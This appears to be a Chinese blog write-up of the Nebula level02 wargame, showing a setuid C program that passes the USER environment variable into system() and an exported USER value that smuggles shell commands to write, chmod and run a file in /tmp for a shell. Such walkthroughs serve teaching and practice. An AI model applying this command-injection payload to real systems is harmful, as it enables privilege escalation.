ExploitExercises_Nebula_Level02
2016-12-26 13:33
405 查看
题目源代码:
运行/home/flag02/flag02,输出:
为了让system执行shell,需要对环境变量USER做手脚:
此时,buffer为:
然后运行程序,shell执行。
#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> int main(int argc, char **argv, char **envp) { char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); buffer = NULL; asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); printf("about to call system(\"%s\")\n", buffer); system(buffer); }
运行/home/flag02/flag02,输出:
about to call system("/bin/echo level02 is cool") level02 is cool
为了让system执行shell,需要对环境变量USER做手脚:
export USER = '-e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool'
此时,buffer为:
/bin/echo -e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool
然后运行程序,shell执行。
相关文章推荐
- Nebula_level02
- Nebula level02
- i春秋 - Exploit-Exercises: Nebula - level02
- [导入]Nebula3学习笔记(6): IO实战, ZIP解压缩程序
- [导入]Nebula3 in CLR
- Nebula3的多线程架构
- 一个困扰我一个多星期的Nebula3的BUG
- Nebula3 渲染系统
- Nebula3学习笔记(1): 序
- Nebula3 SDK 中的新东西
- Nebula3的多线程架构
- ExploitExercises_Nebula_Level06
- 从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点
- [导入]Nebula3学习笔记(7): 网络系统
- Nebula3渲染层: Graphics
- Nebula3渲染层: Graphics
- Nebula3 SDK Nov 2009 更新内容
- Nebula3 资源管理系统
- Nebula_level03
- Nebula3 SDK 中的新东西